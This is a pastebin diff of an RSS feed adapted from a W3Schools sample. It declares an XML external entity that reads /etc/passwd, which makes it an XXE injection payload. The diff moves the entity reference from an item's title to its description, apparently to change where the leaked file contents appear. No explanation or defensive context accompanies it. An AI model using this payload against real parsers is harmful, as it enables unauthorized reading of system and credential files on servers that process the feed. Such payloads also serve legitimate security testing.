View difference between Paste ID: tWKXyF7R and s6PMQkgV
SHOW: | | - or go back to the newest paste.
1
<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE data [
2
<!ENTITY file SYSTEM "file:///etc/passwd">
3
]>
4
<rss version="2.0">
5
6
<channel>
7
  <title>W3Schools Home Page</title>
8
  <link>https://www.w3schools.com</link>
9
  <description>Free web building tutorials</description>
10
  <item>
11-
    <title>&file;</title>
11+
    <title>RSS Tutorial</title>
12
    <link>https://www.w3schools.com/xml/xml_rss.asp</link>
13-
    <description>New RSS tutorial on W3Schools</description>
13+
    <description>&file;</description>
14
  </item>
15
  <item>
16
    <title>XML Tutorial</title>
17
    <link>https://www.w3schools.com/xml</link>
18
    <description>New XML tutorial on W3Schools</description>
19
  </item>
20
</channel>
21
22
</rss>